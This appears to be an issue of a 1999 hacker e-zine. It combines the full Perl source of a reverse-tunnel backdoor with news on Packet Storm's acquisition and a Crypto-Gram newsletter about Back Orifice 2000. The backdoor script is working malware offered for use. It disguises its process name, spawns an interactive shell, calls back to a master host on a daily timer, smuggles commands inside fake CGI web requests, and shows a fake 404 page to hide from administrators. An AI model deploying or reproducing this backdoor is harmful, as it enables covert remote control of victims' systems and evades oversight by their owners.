/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----
----[ THE CODE
<++> rwwwshell.pl
#!/usr/bin/perl
# Reverse-WWW-Tunnel-Backdoor v1.5
# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://r3wt.base.org for updates
#
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
#
$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char!
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER="localhost"; # the host to run on (ip/dns) (the SLAVE needs this!)
#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
$TIME="00:01"; # time when to connect to the master (unset if now)
$DAILY="sure"; # tries to connect once daily if set with something
$PROXY=""; # set this with the Proxy if you must use one
$PROXY_PORT=""; # set this with the Proxy Port if you must use one
# END OF CONFIG # nothing for you to do after this point #
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
}
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "") {
if ($ARGV[0] eq "-h") {
print STDOUT "no commandline option : daemon mode\n";
print STDOUT "using \"-h\" as option : this help\n";
print STDOUT "any other option : slave mode\n";
exit(0);
} else {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
}
}
if (! $SLAVE_MODE) {
&master;
} else {
&slave;
}
# END OF MAIN FUNCTION
############### SLAVE FUNCTION ###############
sub slave {
$pid = 0;
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_SERVER = $PROXY;
$REAL_PORT = $PROXY_PORT;
$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
. $CGI_PREFIX;
} else {
$REAL_SERVER = $SERVER;
$REAL_PORT = $LISTEN_PORT;
$REAL_PREFIX = "GET " . $CGI_PREFIX;
}
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" .$min;
}
}
if ($DAILY) { # if we must connect daily, we
if (fork) { # we fork the daily shell process
sleep(69); # to ensure the master control proc.
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
}
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
}
$forked = 1;
}
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
exit(0);
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
select($r = $rs, undef, undef, 30);
sleep(1);
$output = "";
vec($ws, fileno(W_OUT), 1) = 1;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print W_OUT "\000" || goto END;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
}
&uuencode; # does the encoding of the shell output
$encoded = $REAL_PREFIX . $encoded . "\n";
connect(THC, $remote) || goto END; # connect to master
send (THC, $encoded, 0) || goto END; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
while (! select($r = $rt, undef, undef, 0.00001)) {}
while (1) { # read until EOD (End Of Data)
recv (THC, $readin, 1, 0) || goto OK;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
}
OK: $input =~ s/\n//gs;
&uudecode; # decoding the data from the master
goto END if ( $decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print W_IN "$decoded" || goto END; # sending the data
sleep(1); # to the shell proc.
goto GO;
}
END: kill 9, $pid; $pid = 0;
exit(0);
} # END OF SLAVE FUNCTION
############### MASTER FUNCTION ###############
sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.4 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view a binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
';
YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 80, 0) || print STDOUT "disconnected\n";
$readin =~ s/\r//g;
$input = $input . $readin;
last if ( $input =~ m/\n\n/s );
}
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\n.*$//s;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
} # END OF MASTER FUNCTION
###################### MISC. FUNCTIONS #####################
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# a proxy drops the request if > 8kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "a$cut_length", $uuencoded
if ($codelength > 4111);
}
$encoded = $uuencoded;
$encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE);
} # END OF UUENCODE FUNCTION
sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"`\\\-'
/;
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
} # END OF UUDECODE FUNCTION
sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>
<-->
----[ EOF
--- CUT HERE ---
Ciao...
van Hauser / THC - [The Hacker's Choice]
THC's Webpage -> http://merlin.koeln-net.com/~plasmoid/thc
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----
@HWA
08.0 PacketStorm Security Sells Out?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Who's going to pick up the slack now that Ken has removed himself from
affiliation with Packet Storm? the following sounds well and good but
will this company (Securify) have the same contacts and receive updates
as frequently as Ken used to? I doubt it...well it looks like PSS will
be relegated to being just an archive of old security tools and exploits
hopefully the new system will at least do the old one some justice and
preserve the layout meanwhile we wish Ken WIlliams the best of luck in
his new job whatever that may be.... - Ed
From HNN http://www.hackernews.com
Packet Storm Moves to Kroll-O'Gara
contributed by jkw
As mentioned in the HNN rumors section last week Ken
Williams has sold the rights to Packet Storm Security to
Securify, the Information Security Group of The
Kroll-O'Gara Company. Ken Williams will no longer be
running the site and has accepted a different job within
the Information Security industry. Securify hopes to
have the site operational and online sometime in
September.
Old PSS - With Letter from Ken Williams and Securify
Press Release
New PSS
http://www.securify.com/packetstorm/
Late Update
Wow, this made it into the New York Times.
NY Times - Registration Required
http://www.nytimes.com/library/tech/99/08/biztech/articles/17secure.html
August 17, 1999
Security Firm to Revive
Computer-Defense Site
By PETER WAYNER
roll-O'Gara, the international security consulting firm, said Monday
it would take over an Internet site that not only posted information
about defending computer systems against attacks but also told how to
break into them.
In the shadowy world of hackers and crackers, it is often hard to tell the
good guys from the bad. Computer-security experts frequently test
systems by breaking into them, and the site, Packet Storm, posted
descriptios of those break-ins.
Kroll-O'Gara's computer security unit, Securify, which declined to
discuss financial terms of its acquisition, said it planned to maintain the
site's tradition of high-quality information as a way to market its services.
But Kroll-O'Gara executives said that it would rid the site of its more
contentious publications.
"We see it, from a corporate standpoint, as somewhat risky and
controversial," Charles Breed, Securify's vice president for marketing,
acknowledged. "We'll be publishing a site with very powerful tools and
they can be used for good or evil. Our opinion is that it's better to make
knowledge available than keeping it obscure or hidden."
Tommy Ward, a project manager at Securify, said three Securify
employees would comb through the site, "sanitizing content."
Until late June, Harvard University provided Packet Storm as a service
and picked up the costs of answering requests for more than 10
gigabytes of data traffic a day.
The site, which was edited by Ken Williams, a security consultant not
associated with the university, proved popular with many computer
experts because it collected detailed technical information about the
methods intruders use to exploit weaknesses in computers. These
often-fascinating narratives were mixed with discussions about how to
help systems withstand assault.
Harvard dropped the site in late June after the host of a rival site
complained that Packet Storm had posted defamatory information.
Joe Wrinn, a university spokesman, said, "We're happy that the site will
be online again. That's the original reason we got involved."
Williams called the site "a labor of love," but said it was taking 60 to 80
hours a week to maintain. He will not be associated with the site, which
will be run by Securify employees at Securify.com.
Since Harvard pulled the plug, the site has been inaccessible; computer
professionals looked forward to its relaunch, expected in late September.
"I'm glad that the compendium of information is going to be preserved,"
said Adam Shostack, a computer security consultant.
-=-
Here's the index.html file from the original location of PacketStorm Security
with Ken's message and the Securify press release...
-=-
http://www.genocide2600.com/~tattooman/index.html
To The Supporters of Packet Storm Security:
As you may already be aware, there have been numerous rumors
on the Net recently regarding the revival of Packet Storm
Security through corporate sponsorship. I am pleased to
announce that the rumours are indeed true, and that Packet
Storm will now be hosted by Securify, the Information Security
Group of Kroll-O'Gara.
I have carefully considered the direction and future of PSS
since it was taken down by Harvard, and have entertained
innumerable offers from a wide variety of corporate, non-profit,
and private entities to host the site. Kroll-O'Gara has
presented me with the most impressive vision and plans for PSS.
Not only does Kroll-O'Gara intend to preserve the original
ideals and intent of PSS, but they have developed an exciting
and definitive roadmap for the logical evolution of the site.
Packet Storm Security had reached a stage where it was much
more than a full time job for one person. For the last year
I have been working a minimum of 60 hours a week to maintain
the high quality of the site.
In order to sustain my vision of PSS as *the* resource on the
Internet for freeware Information Security tools, it became
necessary to acquire the resources that only a dedicated
corporate sponsor could provide. I have talked at length with
Matt Barrie (PSS Program Manager) at Kroll-O'Gara ISG, and I
believe that they have grand and noble goals for the future of
Packet Storm Security.
Unfortunately, I will not be with PSS in the future, however,
because I have recently accepted an extremely enticing offer
elsewhere in the Information Security industry. I do,
nevertheless, give my strongest support to the new maintainers
of the site, and I'm excited about what's in store for the
future of PSS.
To all of my valued friends and supporters of the site:
I sincerely hope that you too will continue through your
contributions and suggestions to help make Packet Storm what
it was! Your support has been and will continue to be invaluable
in ensuring that PSS is *the* resource for freeware Information
Security tools.
Respectfully,
Ken Williams
Founder
Packet Storm Security
********** PRESS RELEASE **********
For more information, contact:
Vicky Wu Charles Breed
PR Manager VP of Marketing
KVO Public Relations Securify, Kroll-O'Gara Company
(650) 919-2027 (650) 812-9400 x107
vicky_ku@kvo.com cbreed@securify.com
Matt Barrie
matt@securify.com
packetstorm@securify.com
KROLL-O'GARA INFORMATION SECURITY GROUP ACQUIRES PACKET STORM, THE PREMIER
WEB SITE FOR INFORMATION SECURITY TOOLS & DATA
Packet Storm Security is positioned to be the Internet's largest single
source for computer security threat information, tools and patches
PALO ALTO, Calif., August, 17, 1999 In response to the growing demand for
current and accurate information and tools on computer security, Securify,
the Information Security Group of The Kroll-O'Gara Company (Nasdaq: KROG),
announced today the acquisition of Packet Storm Security; a website
created and maintained by Ken Williams, a renowned computer security
expert. Averaging over 400,000 hits per day, generating over 7 gigabytes
of traffic, Packet Storm Security is an established resource for many
government agencies and major corporations.
"Packet Storm Security provides a strong, long term Internet presence for
Securify," states Dr. Taher Elgamal, President of Securify. "It is a state
of the art resource for our customers and we see it as the nucleus for a
number of exciting additional security management services."
Packet Storm is one of the largest and most well recognized information
security resources on the Internet today. The site consists of over 45,000
security related programs, such as up to date tools, patches, advisories,
vulnerabilities. Considering this massive repository of information,
Packet Storm Security is the ideal site for finding up-to-date information
on the latest threats that face corporate networks and computer systems.
This site has been frequented by system administrators, engineers,
programmers, from organizations such as AT&T, DoD, NSA, FBI, IBM,
Microsoft, GTE, ISS, KPMG, E&Y, InterNIC, Alcatel, NCSC, McAfee, NIST,
USAF, Sprint CA, UK Govt., Mitre, Allied Signal, and CitiGroup bank.
"Our customers have asked for a single source data point to inform and
educate them on the ever increasing number of information security
threats," states Jules Kroll, CEO and Chairman of Kroll-O'Gara Inc. "We
will be dedicating a significant effort to making this site extremely
useful for anyone involved with computer security."
Packet Storm Security is in the process of being updated and refined prior
to being posted in September at http://www.securify.com/packetstorm
# # #
About Securify, the Information Security Group of Kroll-O'Gara
Securify, the Information Security Group of Kroll-O^Gara is composed of
highly regarded industry experts that provide objective information
security services to businesses and government agencies. These services
include network and system security review and repair, product assessment,
the creation and implementation of secure e-commerce sites, architecture
and design.
They also employ internally developed proprietary software that combines
best-of-breed security tools and client information to analyze and assess
network security issues as a scientific discipline. Their approach
employs standard, well-tested methodology, and treats security as both a
business and a technical issue. The Information Security Group is unique
in the security field in that it not only provides the assessment and
recommendations, but also actual implementation and deployment. For more
information, please access their web site at www.securify.com, or contact
the company at (650) 812-9400. Contact Vicki Wu of KVO Public Relations at
(650) 919-2027.
About The Kroll-O'Gara Company
The Kroll-O'Gara Company is a leading global provider of a broad range of
specialized products and services designed to supply solutions to a
variety of security needs. Kroll-O'Gara provides governments, business,
and individuals with information, analysis, training, and products to
mitigate the growing risks associated with white-collar crimes, fraud,
physical attacks, threats of violence, and uninformed decisions based upon
incomplete or inaccurate information. The company is organized into four
primary business groups: Investigations & Intelligence Group, Security
Products & Services Group, Voice and Data Security Group, and the
Information Security Group. Based in New York City, New York, and
Fairfield, Ohio, Kroll-O'Gara employs more than 2,600 people in 60 offices
and plants around the world. For more information, please access the
company's web sites at www.securify.com or www.kroll-ogara.com.
@HWA
09.0 CryptoGram Aug 15th '99
~~~~~~~~~~~~~~~~~~~~~~~
From: Bruce Schneier <schneier@counterpane.com>
CRYPTO-GRAM
August 15, 1999
by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on cryptography and computer security.
Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.
Copyright (c) 1999 by Bruce Schneier
CRYPTO-GRAM now has over 20,000 subscribers!
** *** ***** ******* *********** *************
In this issue:
Back Orifice 2000
Counterpane -- Featured Research
News
Counterpane Systems News
NIST AES News
The Doghouse: HPUX and the UNIX Crypt Algorithm
Web-Based Encrypted E-Mail
Comments from Readers
** *** ***** ******* *********** *************
Back Orifice 2000
Back Orifice is a free remote administration tool for Microsoft Windows.
It's also one of the coolest hacking tools ever developed. Originally
released last July, Back Orifice 2000 (BO2K) is the current release of the
software. It works on Windows 95, Windows 98, and Windows NT. It is much
better written than the original Back Orifice. And it's free, and open source.
There are two parts: a client and a server. The server is installed on the
target machine. The client, residing on another machine anywhere on the
Internet, can now take control of the server.
This is actually a legitimate requirement. Perfectly respectable programs,
like pcAnywhere or Microsoft's own Systems Management Server (SMS), do the
same thing. They allow a network administrator to remotely troubleshoot a
computer. They allow a remote tech support person to diagnose problems.
They are mandatory in many corporate computing environments.
Remote administration tools also have a dark side. If the server is
installed on a computer without the knowledge or consent of its owner, the
client can effectively "own" the victim's PC.
Back Orifice's difference is primarily marketing spin. Since it is not
distributed by a respectable company, it cannot be trusted. Since it was
written by hackers, it is evil. Since its malicious uses are talked about
more, its benevolent uses are ignored. That's wrong; pcAnywhere is just as
much an evil hacking tool as Back Orifice.
Well, not exactly. Back Orifice was designed by a bunch of hackers with
fun in mind. Not only can the client perform normal administration
functions on the server's computer -- upload and download files, delete
files, run programs, change configurations, take control of the keyboard
and mouse, see whatever is on the server's screen -- but it can also do
more subversive things: reboot the computer, display arbitrary dialog
boxes, turn the microphone or camera on and off, capture keystrokes (and
passwords). And there is an extensible plug-in language for others to
write modules. (I'm waiting for someone to write a module that
automatically sniffs for, and records, PGP private keys.)
Back Orifice is also designed to hide itself from the server's owner.
Unless the server's owner is knowledgeable (and suspicious), he will never
know that Back Orifice is running on his computer. (Other remote
administration tools, even SMS, also have stealth modes; Back Orifice is
just better at it.) Anti-virus software has been updated to detect default
Back Orifice configurations, but that will only solve most of the problem.
Because Back Orifice is configurable, because it can be downloaded in
source form and then recompiled to look different...I doubt that all
variants will ever be discovered.
Okay, so who's to blame here? The Cult of the Dead Cow wrote and released
Back Orifice. Surely the world is not a safer place because, as CDC's Sir
Dystic put it: "every 14-year-old who wants to be a hacker will try it."
BO2K's slogan is "show some control," and many will take that imperative
seriously. Back Orifice will be used by lots of unethical people to do all
sorts of unethical things. And that's not good.
On the other hand, Back Orifice can't do anything until the server portion
is installed on some victim's computer. This means that the victim has to
commit a security faux pas before anything else can happen. Not that this
is very hard: lots of people network their computers to the Internet
without adequate protection. An attacker can even ask the victim to
install Back Orifice (social engineering might help); the Worm.ExploreZip
worm of this spring did exactly that. Still, if the victim is sufficiently
vigilant, he can never be attacked by Back Orifice.
But what about Microsoft's computing environment?
One of the reasons Back
Orifice is so nasty is that Microsoft doesn't design its operating systems
to be secure. It never has. Any program that runs in Microsoft Windows 95
and 98 can do anything. In Unix, an attacker would first have to get root
privileges. Not in Windows. There's no such thing as limited privileges,
or administrator privileges, or root privileges. Microsoft assumes that
anyone who can run a program can reformat the hard drive. This might have
made some sense in the age of isolated desktop computers; after all, if you
could run a program, you were standing in front of the machine. But on the
Internet, this is absurd.
Windows NT was designed as a secure operating system, more or less. There
are provisions to make Windows NT a very secure operating system, such as
privilege levels in separate user accounts, file permissions, and kernel
object access control lists. However, the configuration that makes Windows
NT secure is very very far and distant from the default installed
configuration. Microsoft admits this. You have to make 300+ security
checks and modifications to Windows NT to make it secure in its default
configuration. And on top of this, Microsoft assumes that most users have
Administrator access to their desktop machines anyway. They only really
worry about network security, not host-end security, which is where they
are seriously vulnerable to attacks like Back Orifice 2000. Windows NT
could be secure, but Microsoft refuses to ship the OS in that condition
(presumably they worry that their spiffy animated fading menu bars may be
overlooked).
Malicious remote administration tools are a major security risk. What Back
Orifice has done is made mainstream computer users aware of the danger.
Maybe the world would have been safer had they not demonstrated the danger
so graphically, but I am not sure. There are certainly other similar tools
in the hacker world -- one, called BackDoor-G, has recently been discovered
-- some developed with much more sinister purposes in mind. And Microsoft
only responds to security threats if they are demonstrated. Explain the
threat in an academic paper and Microsoft denies it; release a hacking tool
like Back Orifice, and suddenly they take the vulnerability seriously.
Back Orifice Home Page:
http://www.bo2k.com/
Commentary:
http://www.zdnet.com/zdnn/stories/news/0,4586,2127049,00.html
http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/30/o03-30.36.htm
Microsoft's Systems Management Server:
http://www.microsoft.com/smsmgmt/techdetails/remote.asp
http://www.cultdeadcow.com/news/pr19990719.html
BackDoor-G:
http://www.zdnet.com/zdnn/stories/news/0,4586,2267379,00.html
** *** ***** ******* *********** *************
Counterpane -- Featured Research
"Notes on the Design and Analysis of the Yarrow Cryptographic Pseudorandom
Number Generator"
J. Kelsey, B. Schneier, and N. Ferguson, Sixth Annual Workshop on Selected
Areas in Cryptography, Springer Verlag, August 1999, to appear.
We describe the design of Yarrow, a family of cryptographic pseudo-random
number generators (PRNG). We describe the concept of a PRNG as a separate
cryptographic primitive, and the design principles used to develop Yarrow.
We then discuss the ways that PRNGs can fail in practice, which motivates
our discussion of the components of Yarrow and how they make Yarrow secure.
Next, we define a specific instance of a PRNG in the Yarrow family that
makes use of available technology today.
http://www.counterpane.com/yarrow-notes.html
** *** ***** ******* *********** *************
News
Major irony alert: President Clinton signs a bill into law using PGP.
http://www.wired.com/news/news/politics/story/20775.html
A new U.K. bill on e-commerce has the nasty provision that police will be
able to demand access to encryption keys if they suspect criminal use of
the Internet. Those who refuse get a two-year prison sentence.
http://www.wired.com/news/news/politics/story/20937.html
http://techweb.com/news/story/TWB19990726S0010
Text of the bill:
http://www.dti.gov.uk/cii/elec/ecbill.html
Foundation for Internet Policy Research commentary on the bill:
http://www.fipr.org/ecommpr.html
The first three chapters of Alan Turing's treatise on the Enigma, retyped
from the only known paper copy, are available at:
http://home.cern.ch/~frode/crypto/Turing/index.html
The L0pht has released an anti-sniffer tool. It detects sniffers on
networks. Unfortunately, at least one sniffer-detection-resistant sniffer
has been released. And the race continues....
http://www.wired.com/news/news/technology/story/20913.html
L0pht: http://www.l0pht.com/
The Information Society, an academic journal, published a special issue on
anonymity and the Internet: vol. 15, no. 2. Actually, there are
interesting articles in most of the back issues.
http://www.slis.indiana.edu/TIS/tables_of_contents/toc.html
The Encrypting File System (EFS) built into Microsoft Windows 2000 has been
broken.
http://www.ntsecurity.net/forums/2cents/news.asp?IDF=118&TB=news
Microsoft claims that it has not, that the attack is predicated on the user
doing something wrong: leaving the EFS recovery key on the machine.
http://www.microsoft.com/security/bulletins/win2kefs.asp
The author's reply:
http://www.ntsecurity.net/forums/2cents/GetMessage.asp?RootID=2092&ID=2102&I
DF=118&TB=news
I reserve judgment, not having studied EFS, the attack, or Microsoft's
response.
In late May, Janet Reno wrote to German Federal Secretary of Justice Herta
Daubler-Gmelin, asking him to control the distribution of encryption
software over the Internet.
http://www.heise.de/tp/deutsch/inhalt/te/5117/2.html
There's another version of Melissa floating around. This one uses the
".all" extensions in Microsoft Outlook to crash systems. Clever idea,
actually.
http://www.computerworld.com/home/print.nsf/all/990719B50A
This rather impressive espionage device is being sold as a home consumer item:
http://www.x10.com/home/offer.cgi?!ZDX30,../1index761.htm
There has been considerable hoo-hah over a U.S. government plan to monitor
private networks for intrusion, and invade a lot of privacy in the process.
(This will all be at the consent of the various companies, so warrants are
not required.) It's called Fidnet, for Federal Intrusion Detection Network.
http://www12.nytimes.com/library/tech/99/07/biztech/articles/28compute.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2304083,00.html?chkpt=hpqs014
http://www.sjmercury.com/svtech/news/indepth/docs/secure072999.htm
http://techweb.com/wire/story/TWB19990729S0013
http://www.fcw.com/pubs/fcw/1999/0726/web-plan-7-29-99.html
http://www.infoworld.com/cgi-bin/displayStory.pl?990730.enstarwars.htm
EPIC's "Critical Infrastructure Protection and the Endangerment of Civil
Liberties"
http://www.epic.org/security/infowar/epic-cip.html
Copy of the White House plan, and commentary:
http://www.cdt.org/policy/terrorism/fidnet/
The House Appropriations Committee has approved a $36 billion budget for
the departments of Justice, Commerce and State, but included language
specifically barring any spending on FIDNET.
http://www.techweb.com/wire/story/reuters/REU19990730S0005
And the U.S. government backpedals.
http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html
AOL has been hit by an ingenious social engineering attack. This hoax
message, masquerading as a hoax warning, fools users into giving up account
and credit card information.
http://www.zdnet.com/zdnn/stories/news/0,4586,2303536,00.html
The FBI is preventing CMI Communications, a Canadian company, from offering
satellite phone service in the U.S. because the FBI can't eavesdrop on the
calls.
http://www.nationalpost.com/financialpost.asp?f=990716/29896.html
California adopted a new digital signature law, allowing brokerages to use
signed e-mail for contracts.
http://www.computerworld.com/home/news.nsf/all/9907294dig
The case against Kevin Mitnick has finally been dropped.
http://www.msnbc.com/news/178825.asp
Congressman Porter Goss (R-Fla) wants to offer a tax break to companies
that develop encryption products that enable key recovery or other methods
of giving the government access to the encryption keys.
http://www.wired.com/news/news/politics/story/21014.html
A new Excel vulnerability allows a malicious spreadsheet to execute
arbitrary code without the user's permission.
http://www.securityportal.com/list-archive/bugtraq/1999/Jul/0268.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2305495,00.html?chkpt=hpqs014
http://officeupdate.microsoft.com/Articles/mdac_typ.htm
The Ontario Information and Privacy Commissioner has published a pamphlet
that recommends that anyone using e-mail learn to understand and use
encryption.
http://www.ipc.on.ca/Web_site.ups/MATTERS/SUM_PAP/PAPERS/encrypt.htm
